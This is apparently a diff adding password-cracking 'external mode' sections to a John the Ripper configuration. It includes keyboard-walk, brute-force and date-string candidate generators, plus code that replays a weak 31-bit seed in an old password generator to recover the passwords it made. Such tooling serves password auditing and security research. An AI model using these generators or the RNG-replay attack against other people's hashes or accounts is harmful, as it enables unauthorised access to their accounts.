+	c = '0'; while (c <= '9') charset[charset_length++] = c++;
+	charset[charset_length++] = '0';	/* Yep, it's there twice */
+
+	/* Symbols */
+	c = '!'; while (c <= '/') charset[charset_length++] = c++;
+	c = ':'; while (c <= '@') charset[charset_length++] = c++;
+	c = '['; while (c <= '`') charset[charset_length++] = c++;
+	c = '{'; while (c <= '~') charset[charset_length++] = c++;
+}
+
+void generate()
+{
+	int i, rand_seed, rand_result;
+
+	/* Terminate once we've generated for all *
+	 * of the time range (Plus a bit more...) */
+	if (endTime + 1000 < startTime) {
+		word = 0;
+		return;
+	}
+
+	/* Skip msecs that would generate dupes */
+	while (endTime % msec != 0) {
+		if (++msec > 999) {
+			endTime--;
+			msec = 1;
+		}
+	}
+
+	rand_seed = endTime / msec;
+
+	i = 0;
+	while (i < password_length) {
+		/* this works like rand_r() from eglibc */
+		rand_seed = rand_seed * 1103515245 + 12345;
+		rand_result = (rand_seed >> 16) & 2047;
+
+		rand_seed = rand_seed * 1103515245 + 12345;
+		rand_result <<= 10;
+		rand_result ^= (rand_seed >> 16) & 1023;
+
+		rand_seed = rand_seed * 1103515245 + 12345;
+		rand_result <<= 10;
+		rand_result ^= (rand_seed >> 16) & 1023;
+
+		word[i++] = charset[rand_result % charset_length];
+	}
+	word[i] = 0;
+
+	if (++msec > 999) {
+		endTime--;
+		msec = 1;
+	}
+}
+
+void restore()
+{
+	int i, rand_seed, rand_result;
+
+	i = 0;
+
+	/* Very crude restore, just dry-run until we hit last word */
+	while (i != password_length) {
+
+		while (endTime % msec != 0) {
+			if (++msec > 999) {
+				endTime--;
+				msec = 1;
+			}
+		}
+
+		rand_seed = endTime / msec;
+
+		i = 0;
+		while (i < password_length) {
+			/* this works like rand_r() from eglibc */
+			rand_seed = rand_seed * 1103515245 + 12345;
+			rand_result = (rand_seed >> 16) & 2047;
+
+			rand_seed = rand_seed * 1103515245 + 12345;
+			rand_result <<= 10;
+			rand_result ^= (rand_seed >> 16) & 1023;
+
+			rand_seed = rand_seed * 1103515245 + 12345;
+			rand_result <<= 10;
+			rand_result ^= (rand_seed >> 16) & 1023;
+
+			if (charset[rand_result % charset_length] != word[i++])
+				break;
+		}
+
+		if (++msec > 999) {
+			endTime--;
+			msec = 1;
+		}
+	}
+}
+
+/* Awesome Password Generator RNG replay
+ * Written by Michael Samuel <mik@miknet.net>
+ * Public Domain.
+ *
+ * This takes advantage of a subtle bug, where a crypto RNG is used to
+ * seed the C# System.Random() class, which takes a 32-bit input, but
+ * converts negative numbers into non-negative numbers, resulting in
+ * only 31 bits of security.
+ *
+ * This only implements "easy to type" being *unticked*, and numbers,
+ * lowers, uppers and symbols being ticked, in random password mode.
+ * Changing the password length is easy, anything else is left as an
+ * exercise to the reader.
+ *
+ * Running Awesome Password Generator (1.3.2 or lower) in Mono is still
+ * vulnerable, but uses a different RNG, so this mode isn't compatible.
+ */
+
+/* Awesome Password Generator 1.3.2 does a two-pass run, selecting which
+ * charset each position will have, then picking the character.  This
+ * leads to heavy bias, and is fixed in 1.4.0 (along with many other
+ * fixes).  If you have been using Awesome Password Generator, you should
+ * upgrade immediately and change your passwords.
+ */
+[List.External:AwesomePasswordGenerator]
+int numbers[10];
+int lowers[26];
+int uppers[26];
+int symbols[32];
+
+/* Since we don't have a double datatype, I simply pre-calculated the
+ * transition numbers calculating the scale formula:
+ * (double)randNum * 4.656612873077393e-10 * {4/10/26/32}
+ */
+int boundaries_charclass[4];
+int boundaries_numbers[10];
+int boundaries_letters[26];
+int boundaries_symbols[32];
+
+/* This is the bug we're exploiting - the seed for the RNG is 32 bits
+ * from the crypto rng.  The non-crypto RNG converts negative numbers
+ * into non-negative numbers, so there's only 2^31 possible seeds.
+ */
+int seed;
+
+int password_length;
+
+void init()
+{
+	password_length = 16; /* Change this to match config */
+
+	int c, i;
+
+	c = '0'; i = 0; while (c <= '9') numbers[i++] = c++;
+	c = 'a'; i = 0; while (c <= 'z') lowers[i++] = c++;
+	c = 'A'; i = 0; while (c <= 'Z') uppers[i++] = c++;
+
+	/* Symbols */
+	i = 0;
+	symbols[i++] = '!'; symbols[i++] = '@'; symbols[i++] = '#'; symbols[i++] = '$';
+	symbols[i++] = '%'; symbols[i++] = '^'; symbols[i++] = '&'; symbols[i++] = '*';
+	symbols[i++] = '('; symbols[i++] = ')'; symbols[i++] = '~'; symbols[i++] = '-';
+	symbols[i++] = '_'; symbols[i++] = '='; symbols[i++] = '+'; symbols[i++] = '\\';
+	symbols[i++] = '|'; symbols[i++] = '/'; symbols[i++] = '['; symbols[i++] = ']';
+	symbols[i++] = '{'; symbols[i++] = '}'; symbols[i++] = ';'; symbols[i++] = ':';
+	symbols[i++] = '`'; symbols[i++] = '\''; symbols[i++] = '"'; symbols[i++] = ',';
+	symbols[i++] = '.'; symbols[i++] = '<'; symbols[i++] = '>'; symbols[i++] = '?';
+
+	i = 0;
+	boundaries_charclass[i++] = 536870912; boundaries_charclass[i++] = 1073741824;
+	boundaries_charclass[i++] = 1610612736; boundaries_charclass[i++] = 2147483647;
+
+	i = 0;
+	boundaries_numbers[i++] = 214748365; boundaries_numbers[i++] = 429496730;
+	boundaries_numbers[i++] = 644245095; boundaries_numbers[i++] = 858993460;
+	boundaries_numbers[i++] = 1073741824; boundaries_numbers[i++] = 1288490189;
+	boundaries_numbers[i++] = 1503238554; boundaries_numbers[i++] = 1717986919;
+	boundaries_numbers[i++] = 1932735284; boundaries_numbers[i++] = 2147483647;
+
+	i = 0;
+	boundaries_letters[i++] = 82595525; boundaries_letters[i++] = 165191050;
+	boundaries_letters[i++] = 247786575; boundaries_letters[i++] = 330382100;
+	boundaries_letters[i++] = 412977625; boundaries_letters[i++] = 495573150;
+	boundaries_letters[i++] = 578168675; boundaries_letters[i++] = 660764200;
+	boundaries_letters[i++] = 743359725; boundaries_letters[i++] = 825955250;
+	boundaries_letters[i++] = 908550775; boundaries_letters[i++] = 991146300;
+	boundaries_letters[i++] = 1073741824; boundaries_letters[i++] = 1156337349;
+	boundaries_letters[i++] = 1238932874; boundaries_letters[i++] = 1321528399;
+	boundaries_letters[i++] = 1404123924; boundaries_letters[i++] = 1486719449;
+	boundaries_letters[i++] = 1569314974; boundaries_letters[i++] = 1651910499;
+	boundaries_letters[i++] = 1734506024; boundaries_letters[i++] = 1817101549;
+	boundaries_letters[i++] = 1899697074; boundaries_letters[i++] = 1982292599;
+	boundaries_letters[i++] = 2064888124; boundaries_letters[i++] = 2147483647;
+
+	i = 0;
+	boundaries_symbols[i++] = 67108864; boundaries_symbols[i++] = 134217728;
+	boundaries_symbols[i++] = 201326592; boundaries_symbols[i++] = 268435456;
+	boundaries_symbols[i++] = 335544320; boundaries_symbols[i++] = 402653184;
+	boundaries_symbols[i++] = 469762048; boundaries_symbols[i++] = 536870912;
+	boundaries_symbols[i++] = 603979776; boundaries_symbols[i++] = 671088640;
+	boundaries_symbols[i++] = 738197504; boundaries_symbols[i++] = 805306368;
+	boundaries_symbols[i++] = 872415232; boundaries_symbols[i++] = 939524096;
+	boundaries_symbols[i++] = 1006632960; boundaries_symbols[i++] = 1073741824;
+	boundaries_symbols[i++] = 1140850688; boundaries_symbols[i++] = 1207959552;
+	boundaries_symbols[i++] = 1275068416; boundaries_symbols[i++] = 1342177280;
+	boundaries_symbols[i++] = 1409286144; boundaries_symbols[i++] = 1476395008;
+	boundaries_symbols[i++] = 1543503872; boundaries_symbols[i++] = 1610612736;
+	boundaries_symbols[i++] = 1677721600; boundaries_symbols[i++] = 1744830464;
+	boundaries_symbols[i++] = 1811939328; boundaries_symbols[i++] = 1879048192;
+	boundaries_symbols[i++] = 1946157056; boundaries_symbols[i++] = 2013265920;
+	boundaries_symbols[i++] = 2080374784; boundaries_symbols[i++] = 2147483647;
+
+	seed = 0;
+}
+
+void generate()
+{
+	int i, j, s, next, nextp, val, bucket, randnum, used_charsets;
+	int seedarray[56];
+
+	/* BEGIN System.Random(seed) */
+	if(seed < 0) {
+		/* Only bother with non-negative integers */
+		word = 0;
+		return;
+	}
+
+	s = 161803398 - seed++;
+	seedarray[55] = s;
+	i = val = 1;
+
+	while(i < 55) {
+		bucket = 21 * i % 55;
+		seedarray[bucket] = val;
+		val = s - val;
+		if(val < 0) val += 2147483647;
+		s = seedarray[bucket];
+		i++;
+	}
+
+	i = 1;
+	while(i < 5) {
+		j = 1;
+		while(j < 56) {
+			seedarray[j] -= seedarray[1 + (j + 30) % 55];
+			if(seedarray[j] < 0) seedarray[j] += 2147483647;
+			j++;
+		}
+		i++;
+	}
+	next = 0;
+	nextp = 21;
+	/* END System.Random(seed) */
+
+	used_charsets = 0;
+	while(used_charsets != 15) {
+		i = 0;
+		while(i < password_length) {
+			/* BEGIN Random.Sample() */
+			if (++next >= 56) next = 1;
+			if (++nextp >= 56) nextp = 1;
+			randnum = seedarray[next] - seedarray[nextp];
+			if (randnum == 2147483647) randnum--;
+			if (randnum < 0) randnum += 2147483647;
+			seedarray[next] = randnum;
+			/* END Random.Sample() */
+
+			j = 0;
+			while(boundaries_charclass[j] < randnum) j++;
+
+			word[i] = j; /* Temporarily store in word[] */
+			used_charsets |= (1 << j);
+			i++;
+		}
+	}
+
+	i = 0;
+	while(i < password_length) {
+		/* BEGIN Random.Sample() */
+		if (++next >= 56) next = 1;
+		if (++nextp >= 56) nextp = 1;
+		randnum = seedarray[next] - seedarray[nextp];
+		if (randnum == 2147483647) randnum--;
+		if (randnum < 0) randnum += 2147483647;
+		seedarray[next] = randnum;
+		/* END Random.Sample() */
+		j = 0;
+
+		if(word[i] == 0) {
+			while(boundaries_letters[j] < randnum) j++;
+			word[i++] = lowers[j];
+		} else if (word[i] == 1) {
+			while(boundaries_letters[j] < randnum) j++;
+			word[i++] = uppers[j];
+		} else if (word[i] == 2) {
+			while(boundaries_numbers[j] < randnum) j++;
+			word[i++] = numbers[j];
+		} else { /* if (word[i] == 3) */
+			while(boundaries_symbols[j] < randnum) j++;
+			word[i++] = symbols[j];
+		}
+	}
+	word[i] = 0;
+}
+
+
+void restore()
+{
+	int i, j, s, next, nextp, val, bucket, randnum, used_charsets;
+	int seedarray[56];
+	int candidate[32]; /* This needs to be at-least as big as password-length */
+
+	seed = 0;
+
+	while(seed > 0) {
+		/* BEGIN System.Random(seed) */
+		s = 161803398 - seed++;
+		seedarray[55] = s;
+		i = val = 1;
+
+		while(i < 55) {
+			bucket = 21 * i % 55;
+			seedarray[bucket] = val;
+			val = s - val;
+			if(val < 0) val += 2147483647;
+			s = seedarray[bucket];
+			i++;
+		}
+
+		i = 1;
+		while(i < 5) {
+			j = 1;
+			while(j < 56) {
+				seedarray[j] -= seedarray[1 + (j + 30) % 55];
+				if(seedarray[j] < 0) seedarray[j] += 2147483647;
+				j++;
+			}
+			i++;
+		}
+		next = 0;
+		nextp = 21;
+		/* END System.Random(seed) */
+
+		used_charsets = 0;
+		while(used_charsets != 15) {
+			i = 0;
+			while(i < password_length) {
+				/* BEGIN Random.Sample() */
+				if (++next >= 56) next = 1;
+				if (++nextp >= 56) nextp = 1;
+				randnum = seedarray[next] - seedarray[nextp];
+				if (randnum == 2147483647) randnum--;
+				if (randnum < 0) randnum += 2147483647;
+				seedarray[next] = randnum;
+				/* END Random.Sample() */
+
+				j = 0;
+				while(boundaries_charclass[j] < randnum) j++;
+
+				candidate[i] = j;
+				used_charsets |= (1 << j);
+				i++;
+			}
+		}
+
+		i = 0;
+		while(i < password_length) {
+			/* BEGIN Random.Sample() */
+			if (++next >= 56) next = 1;
+			if (++nextp >= 56) nextp = 1;
+			randnum = seedarray[next] - seedarray[nextp];
+			if (randnum == 2147483647) randnum--;
+			if (randnum < 0) randnum += 2147483647;
+			seedarray[next] = randnum;
+			/* END Random.Sample() */
+			j = 0;
+
+			if(candidate[i] == 0) {
+				while(boundaries_letters[j] < randnum) j++;
+				if(lowers[j] != word[i++]) break;
+			} else if (candidate[i] == 1) {
+				while(boundaries_letters[j] < randnum) j++;
+				if(uppers[j] != word[i++]) break;
+			} else if (candidate[i] == 2) {
+				while(boundaries_numbers[j] < randnum) j++;
+				if(numbers[j] != word[i++]) break;
+			} else { /* if (word[i] == 3) */
+				while(boundaries_symbols[j] < randnum) j++;
+				if(symbols[j] != word[i++]) break;
+			}
+		}
+		if(i == password_length) return;
+	}
+}
+
+# Try sequences of adjacent keys on a keyboard as candidate passwords
+[List.External:Keyboard]
+int maxlength, length;	// Maximum password length to try, current length
+int fuzz;		// The desired "fuzz factor", either 0 or 1
+int id[15];		// Current character indices for each position
+int m[0x800];		// The keys matrix
+int mc[0x100];		// Counts of adjacent keys
+int f[0x40], fc;	// Characters for the first position, their count
+
+void init()
+{
+	int minlength;
+	int i, j, c, p;
+	int k[0x40];
+
+	// Initial password length to try
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	fuzz = 1;			// "Fuzz factor", set to 0 for much quicker runs
+
+/*
+ * This defines the keyboard layout, by default for a QWERTY keyboard.
+ */
+	i = 0; while (i < 0x40) k[i++] = 0;
+	k[0] = '`';
+	i = 0; while (++i <= 9) k[i] = '0' + i;
+	k[10] = '0'; k[11] = '-'; k[12] = '=';
+	k[0x11] = 'q'; k[0x12] = 'w'; k[0x13] = 'e'; k[0x14] = 'r';
+	k[0x15] = 't'; k[0x16] = 'y'; k[0x17] = 'u'; k[0x18] = 'i';
+	k[0x19] = 'o'; k[0x1a] = 'p'; k[0x1b] = '['; k[0x1c] = ']';
+	k[0x1d] = '\\';
+	k[0x21] = 'a'; k[0x22] = 's'; k[0x23] = 'd'; k[0x24] = 'f';
+	k[0x25] = 'g'; k[0x26] = 'h'; k[0x27] = 'j'; k[0x28] = 'k';
+	k[0x29] = 'l'; k[0x2a] = ';'; k[0x2b] = '\'';
+	k[0x31] = 'z'; k[0x32] = 'x'; k[0x33] = 'c'; k[0x34] = 'v';
+	k[0x35] = 'b'; k[0x36] = 'n'; k[0x37] = 'm'; k[0x38] = ',';
+	k[0x39] = '.'; k[0x3a] = '/';
+
+	i = 0; while (i < 0x100) mc[i++] = 0;
+	fc = 0;
+
+	/* rows */
+	c = 0;
+	i = 0;
+	while (i < 0x40) {
+		p = c;
+		c = k[i++] & 0xff;
+		if (!c) continue;
+		f[fc++] = c;
+		if (!p) continue;
+		m[(c << 3) + mc[c]++] = p;
+		m[(p << 3) + mc[p]++] = c;
+	}
+	f[fc] = 0;
+
+	/* columns */
+	i = 0;
+	while (i < 0x30) {
+		p = k[i++] & 0xff;
+		if (!p) continue;
+		j = 1 - fuzz;
+		while (j <= 1 + fuzz) {
+			c = k[i + 0x10 - j++] & 0xff;
+			if (!c) continue;
+			m[(c << 3) + mc[c]++] = p;
+			m[(p << 3) + mc[p]++] = c;
+		}
+	}
+
+	length = 0;
+	while (length < minlength)
+		id[length++] = 0;
+}
+
+void generate()
+{
+	int i, p, maxcount;
+
+	word[i = 0] = p = f[id[0]];
+	while (++i < length)
+		word[i] = p = m[(p << 3) + id[i]];
+	word[i--] = 0;
+
+	if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
+	while (++id[i] >= maxcount) {
+		if (!i) {
+			if (length < maxlength) {
+				id[0] = 0;
+				id[length++] = 0;
+			}
+			return;
+		}
+		id[i--] = 0;
+		if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
+	}
+}
+
+void restore()
+{
+	int i;
+
+	/* Calculate the length */
+	length = 0;
+	while (word[length])
+		id[length++] = 0;
+
+	/* Infer the first character index */
+	i = -1;
+	while (++i < fc) {
+		if (f[i] == word[0]) {
+			id[0] = i;
+			break;
+		}
+	}
+
+	/* This sample can be enhanced to infer the rest of the indices here */
+}
+
+# Simplest (fastest?) possible dumb exhaustive search, demonstrating a
+# mode that does not need any special restore() handling.
+# Defaults to printable ASCII.
+[List.External:DumbDumb]
+int maxlength;		// Maximum password length to try
+int startchar, endchar;	// Range of characters (inclusive)
+
+void init()
+{
+	int i;
+
+	startchar = ' ';	// Start with space
+	endchar = '~';		// End with tilde
+
+	// Create first word, honoring --min-len
+	if (!(i = req_minlen))
+		i++;
+	word[i] = 0;
+	while (i--)
+		word[i] = startchar;
+	word[0] = startchar - 1;
+
+	if (req_maxlen)
+		maxlength = req_maxlen;		// --max-len
+	else
+		maxlength = cipher_limit;	// format's limit
+}
+
+void generate()
+{
+	int i;
+
+	if (++word <= endchar)
+		return;
+
+	i = 0;
+
+	while (word[i] > endchar) {
+		word[i++] = startchar;
+		if (!word[i]) {
+			word[i] = startchar;
+			word[i + 1] = 0;
+		} else
+			word[i]++;
+	}
+
+	if (i >= maxlength)
+		word = 0;
+}
+
+/*
+ * This mode will resume correctly without any restore handing.
+ * The empty function just confirms to John that everything is in order.
+ */
+void restore()
+{
+}
+
+# Generic implementation of "dumb" exhaustive search, given a range of lengths
+# and an arbitrary charset.  This is pre-configured to try 8-bit characters
+# against LM hashes, which is only reasonable to do for very short password
+# half lengths.
+[List.External:DumbForce]
+int maxlength;		// Maximum password length to try
+int last;		// Last character position, zero-based
+int lastid;		// Character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x100], c0;	// Character set
+
+void init()
+{
+	int minlength;
+	int i, c;
+
+	// Initial password length to try, must be at least 1
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+
+/*
+ * This defines the character set.
+ *
+ * Let's say, we want to try TAB, all non-control ASCII characters, and all
+ * 8-bit characters, including the 8-bit terminal controls range (as these are
+ * used as regular national characters with some 8-bit encodings), but except
+ * for known terminal controls (risky for the terminal we may be running on).
+ *
+ * Also, let's say our hashes are case-insensitive, so skip lowercase letters
+ * (this is right for LM hashes).
+ */
+	i = 0;
+	charset[i++] = 9;		// Add horizontal TAB (ASCII 9), then
+	c = ' ';			// start with space (ASCII 32) and
+	while (c < 'a')			// proceed till lowercase 'a'
+		charset[i++] = c++;
+	c = 'z' + 1;			// Skip lowercase letters and
+	while (c <= 0x7e)		// proceed for all printable ASCII
+		charset[i++] = c++;
+	c++;				// Skip DEL (ASCII 127) and
+	while (c < 0x84)		// proceed over 8-bit codes till IND
+		charset[i++] = c++;
+	charset[i++] = 0x86;		// Skip IND (84 hex) and NEL (85 hex)
+	charset[i++] = 0x87;
+	c = 0x89;			// Skip HTS (88 hex)
+	while (c < 0x8d)		// Proceed till RI (8D hex)
+		charset[i++] = c++;
+	c = 0x91;			// Skip RI, SS2, SS3, DCS
+	while (c < 0x96)		// Proceed till SPA (96 hex)
+		charset[i++] = c++;
+	charset[i++] = 0x99;		// Skip SPA, EPA, SOS
+	c = 0xa0;			// Skip DECID, CSI, ST, OSC, PM, APC
+	while (c <= 0xff)		// Proceed with the rest of 8-bit codes
+		charset[i++] = c++;
+
+/* Zero-terminate it, and cache the first character */
+	charset[i] = 0;
+	c0 = charset[0];
+
+	last = minlength - 1;
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = -1;
+	word[i] = 0;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = charset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+	} else				// We're done
+		word = 0;
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = 0; while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = 0;	// Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# Generic implementation of exhaustive search for a partially-known password.
+# This is pre-configured for length 8, lowercase and uppercase letters in the
+# first 4 positions (52 different characters), and digits in the remaining 4
+# positions - however, the corresponding part of init() may be modified to use
+# arbitrary character sets or even fixed characters for each position.
+[List.External:KnownForce]
+int last;		// Last character position, zero-based
+int lastofs;		// Last character position offset into charset[]
+int lastid;		// Current character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x7f00];	// Character sets, 0x100 elements for each position
+
+void init()
+{
+	int length, maxlength;
+	int pos, ofs, i, c;
+
+	if (req_minlen)
+		length = req_minlen;
+	else
+		length = 8;	// Password length to try (NOTE: other [eg. shorter]
+				// lengths will not be tried!)
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+
+/* This defines the character sets for different character positions */
+	if (length > maxlength)
+		length = maxlength;
+	pos = 0;
+	while (pos < 4) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a';
+		while (c <= 'z')
+			charset[ofs + i++] = c++;
+		c = 'A';
+		while (c <= 'Z')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+	while (pos < length) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+
+	last = length - 1;
+	pos = -1;
+	while (++pos <= last)
+		word[pos] = charset[id[pos] = pos << 8];
+	lastid = (lastofs = last << 8) - 1;
+	word[pos] = 0;
+}
+
+void generate()
+{
+	int pos;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	word[pos = last] = charset[lastid = lastofs];
+	while (pos--) {			// Have a preceding position?
+		if (word[pos] = charset[++id[pos]]) return;
+		word[pos] = charset[id[pos] = pos << 8];
+	}
+
+	word = 0;			// We're done
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = lastofs = last << 8;
+		while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = lastofs; // Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# A variation of KnownForce configured to try likely date and time strings.
+[List.External:DateTime]
+int last;		// Last character position, zero-based
+int lastofs;		// Last character position offset into charset[]
+int lastid;		// Current character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x7f00];	// Character sets, 0x100 elements for each position
+
+void init()
+{
+	int length;
+	int pos, ofs, i, c;
+
+	length = 8;	// Must be one of: 4, 5, 7, 8
+
+/* This defines the character sets for different character positions */
+	pos = 0;
+	while (pos < length - 6) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+	if (pos) {
+		ofs = pos++ << 8;
+		charset[ofs] = '/';
+		charset[ofs + 1] = '.';
+		charset[ofs + 2] = ':';
+		charset[ofs + 3] = 0;
+	}
+	while (pos < length - 3) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+	ofs = pos++ << 8;
+	charset[ofs] = '/';
+	charset[ofs + 1] = '.';
+	charset[ofs + 2] = ':';
+	charset[ofs + 3] = 0;
+	while (pos < length) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+
+	last = length - 1;
+	pos = -1;
+	while (++pos <= last)
+		word[pos] = charset[id[pos] = pos << 8];
+	lastid = (lastofs = last << 8) - 1;
+	word[pos] = 0;
+}
+
+void generate()
+{
+	int pos;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	word[pos = last] = charset[lastid = lastofs];
+	while (pos--) {			// Have a preceding position?
+		if (word[pos] = charset[++id[pos]]) return;
+		word[pos] = charset[id[pos] = pos << 8];
+	}
+
+	word = 0;			// We're done
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = lastofs = last << 8;
+		while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = lastofs; // Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# Try strings of repeated characters.
+#
+# This is the code which is common for all [List.External:Repeats*]
+# sections which include this External_base section.
+# The generate() function will limit the maximum length of generated
+# candidates to either the format's limit (maximum password length)
+# or to the limit specified with --stdout=LENGTH (Default: 125),
+# thus avoiding duplicate candidates for formats with limited maximum
+# passwortd length.
+# The comparison of the current length and the limit is only done
+# after switching to a new length.
+# So, if the minimum length specified already exceeds this limit,
+# then all the candidates for the minimum length will be generated
+# nevertheless.
+[List.External_base:Repeats]
+int minlength, maxlength, minc, maxc, length, c;
+
+void generate()
+{
+	int i;
+
+	i = 0;
+	while (i < length)
+		word[i++] = c;
+	word[i] = 0;
+
+	if (c++ < maxc)
+		return;
+
+	c = minc;
+
+	if (++length > maxlength)
+		c = 0; // Will NUL out the next "word" and thus terminate
+}
+
+# Try strings of repeated characters (range: space - 0xff).
+[List.External:Repeats]
+.include [List.External_base:Repeats]
+void init()
+{
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	minc = 0x20;
+	maxc = 0xff;
+
+	length = minlength; c = minc;
+}
+
+# Try strings of repeated digits (range: '0' - '9').
+[List.External:Repeats_digits]
+.include [List.External_base:Repeats]
+void init()
+{
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	minc = '0';
+	maxc = '9';
+
+	length = minlength; c = minc;
+}
+
+# Try strings of repeated lowercase letters (range: 'a' - 'z').
+[List.External:Repeats_lowercase]
+.include [List.External_base:Repeats]
+void init()
+{
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	minc = 'a';
+	maxc = 'z';
+
+	length = minlength; c = minc;
+}
+
+# Try strings of repeated printable ASCII characters
+# (range: ' ' - '~').
+[List.External:Repeats_printable_ASCII]
+.include [List.External_base:Repeats]
+void init()
+{
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	minc = ' ';
+	maxc = '~';
+
+	length = minlength; c = minc;
+}
+
+# Try character sequences ("0123456", "acegikmoqs", "ZYXWVU", etc.).
+#
+# The generate() function will limit the maximum length of generated
+# candidates to either the format's limit (maximum password length)
+# or to the limit specified with --stdout=LENGTH (Default: 125),
+# thus avoiding duplicate candidates for formats with limited maximum
+# passwortd length.
+# The comparison of the current length and the limit is only done
+# after switching to a new length.
+# So, if the minimum length specified already exceeds this limit,
+# then all the candidates for the minimum length will be generated
+# nevertheless.
+# External modes reusing this External_base mode should only need to
+# adjust the init() function.
+# In the init() function, a minimum length which is > 1 should be
+# specified.
+# Otherwise, the generated candidates will not depend on the increment
+# specified.
+# For length = 1, the candidates will be the same as for external mode
+# Repeats with length 1.
+# Actually, Repeats is a special case of Sequence, using increment = 0.
+# External modes reusing this External_base mode should also make sure
+# that the number of different characters (specified as a range from "from"
+# to "to") is not smaller than the minimum length ("minlength"),
+# if the start increment "inc" is 1.
+# For a start increment > 1, the number of different characters in the
+# range "from" - "to" must be greater than or equal to
+# (1 + ("minlength" - 1) * "inc").
+# Otherwise you might get unexpected results.
+# The range of characters to be used for the sequences needs to be
+# specified by adjusting the "from" and "to" variables.
+# To generate sequences which decrement characters ("987654"),
+# "from" must be > "to".
+# Otherwise, the generated sequences will increment characters ("abcdef").
+#
+# Variables to be used and the generate() function are common
+# for all sections which include this External_base section.
+[List.External_base:Sequence]
+/*
+ * See the [List.External:Sequence_0-9] section to learn more about
+ * the meaning of these variables which can be adjusted to define
+ * new external modes based on an existing one:
+ */
+int minlength, from, to, maxlength, inc, direction;
+
+/*
+ * The value of these variables shouldn't be changed when copying
+ * an existing external mode:
+ */
+int length, first;
+
+void generate()
+{
+	int i;
+
+	i = 0;
+
+	while (i < length) {
+		word[i] = first + (i * inc * direction);
+		++i;
+	}
+	word[i] = 0;
+
+	// start the next sequence of the same length
+	// with the next character
+	first = first + direction;
+
+	// But check that a sequence of the current length
+	// is still possible (without leaving the range of
+	// characters allowed
+	if ((direction > 0 && first + (length - 1) * inc > to) ||
+	    (direction < 0 && first - (length - 1) * inc < to)) {
+		// No more sequence is possible. Reset start character
+		first = from;
+		// Now try the next length.
+		// But just in case an individual External mode reusing
+		// this External_base mode did specify a maxlength
+		// which is larger than the one supported by the format
+		// or by --stdout=LENGTH, make sure no more candidates
+		// are generated.
+		// Checking this just once per length per increment
+		// doen't really hurt performance.
+		if (maxlength > cipher_limit)
+			maxlength = cipher_limit;
+
+		// For a similar reason, the maximum length of a
+		// sequence is limited by the number of different
+		// characters and by the increment.
+		// The larger the increment, the smaller
+		// the maximum possible length for a given
+		// character range.
+		while (inc  * (maxlength - 1) > direction * (to - from))
+			--maxlength;
+
+		if (++length > maxlength) {
+			// The maximum length for this increment has been reached.
+			// Restart at minimum length with the next possible
+			// increment
+			++inc;
+			// Unfortunately, we have to check again
+			// if the maximum length needs to be reduced
+			// for the new increment
+			while (inc * (maxlength - 1) > direction * (to - from))
+				--maxlength;
+
+			length = minlength;
+		}
+		if (maxlength < minlength)
+			// With the current increment, we can't even generate
+			// sequences of the minimum required length.
+			// So we need to stop here.
+			// This will make sure that no more candidiates
+			//  will be generated:
+			first = 0;
+	}
+}
+
